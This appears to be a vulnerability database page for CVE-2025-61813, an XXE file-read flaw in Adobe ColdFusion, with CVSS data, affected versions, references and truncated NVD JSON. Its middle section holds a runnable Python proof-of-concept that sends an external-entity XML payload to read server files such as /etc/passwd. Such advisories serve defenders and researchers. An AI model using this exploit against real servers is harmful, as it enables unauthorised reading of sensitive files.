CVE-2025-61813

Description

ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does requires user interaction and scope is changed.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:* - VULNERABLE

Adobe ColdFusion 2025.4及更早版本

Adobe ColdFusion 2023.16及更早版本

Adobe ColdFusion 2021.22及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-61813 XXE PoC for Adobe ColdFusion
# Read arbitrary files via XML External Entity Injection

TARGET_URL = "http://target.com/CFIDE/wizards/common/utils.cfc"

def exploit_xxe(target_url, file_to_read):
    """
    Exploit XXE vulnerability to read arbitrary files from the server
    """
    # XML payload with external entity reference
    xml_payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file://{file_to_read}">
]>
<wddxPacket version="1.0">
  <header/>
  <data>
    <string>&xxe;</string>
  </data>
</wddxPacket>'''
    
    headers = {
        'Content-Type': 'text/xml',
        'SOAPAction': ''
    }
    
    try:
        response = requests.post(target_url, data=xml_payload, headers=headers, timeout=30)
        if response.status_code == 200:
            print(f"[+] Successfully retrieved: {file_to_read}")
            print(f"[+] Response:\n{response.text}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        file_path = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
        exploit_xxe(target, file_path)
    else:
        print("Usage: python cve_2025_61813.py <target_url> <file_to_read>")
        print("Example: python cve_2025_61813.py http://victim.com /etc/passwd")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61813
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61813
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61813/
[4] VulDB https://vuldb.com/cve/CVE-2025-61813
[5] https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61813", "sourceIdentifier": "[email protected]", "published": "2025-12-10T00:16:09.990", "lastModified": "2026-04-28T03:16:01.580", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does requires user interaction and scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:*", "matchCriteriaId": "7A94B406-C011-4673-8C2B-0DD94D46CC4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:*", "matchCriteriaId": "AFD05E3A-10F9-4C75-9710-BA46B66FF6E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:*", "matchCriteriaId": "F1FC7D1D-6DD2-48B2-980F-B001B0F24473"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:*", "matchCriteriaId": "1FA19E1D-61C2-4640-AF06-4BCFE750BDF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:*", "matchCriteriaId": "3F331DEA-F3D0-4B13-AB1E-6FE39B2BB55D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update13:*:*:*:*:*:*", "matchCriteriaId": "63D5CF84-4B0D-48AE-95D6-262AEA2FFDE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update14:*:*:*:*:*:*", "matchCriteriaId": "10616A3A-0C1C-474A-BD7D-A2A5BB870F74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update15:*:*:*:*:*:*", "matchCriteriaId": "D7DA523E-1D9B-45FD-94D9-D4F9F2B9296B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update16:*:*:*:*:*:*", "matchCriteriaId": "151AFF8B-F05C-4D27-85FC-DF88E9C11BEA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update17:*:*:*:*:*:*", "matchCriteriaId": "53A0E245-2915-4DFF-AFB5-A12F5C435702"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update18:*:*:*:*:*:*", "matchCriteriaId": "C5653D18-7534-48A3-819F-9F049A418F99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update19:*:*:*:*:*:*", "matchCriteriaId": "BABC6468-A780-4080-A930-4125D1B39C51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update2:*:*:*:*:*:*", "matchCriteriaId": "D57C8681-AC68-47DF-A61E-B5C4B4A47663"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update20:*:*:*:*:*:*", "matchCriteriaId": "F58633C9-E957-46B7-8F5B-B060A8726E33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update21:*:*:*:*:*:*", "matchCriteriaId": "3CF83653-86BB-461A-87F8-65D99EF2276E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update22:*:*:*:*:*:*", "matchCriteriaId": "C2C67E15-22DE-44C0-8CB1-9AF8FCF09FA5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update3:*:*:*:*:*:*", "matchCriteriaId": "75608383-B727-48D6-8FFA-D552A338A562"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update4:*:*:*:*:*:*", "matchCriteriaId": "7773DB68-414A-4BA9-960F-52471A784379"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update5:*:*:*:*:*:*", "matchCriteriaId": "B38B9E86-BCD5-4BCA-8FB7-EC55905184E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update6:*:*:*:*:*:*", "matchCriteriaId": "5E7BAB80-8455-4570-A2A2-8F40469EE9CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update7:*:*:*:*:*:*", "matchCriteriaId": "F9D645A2-E02D-4E82-A2BD-0A7DE5B8FBCC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update8:*:*:*:*:*:*", "matchCriteriaId": "6E22D701-B0 ... (truncated)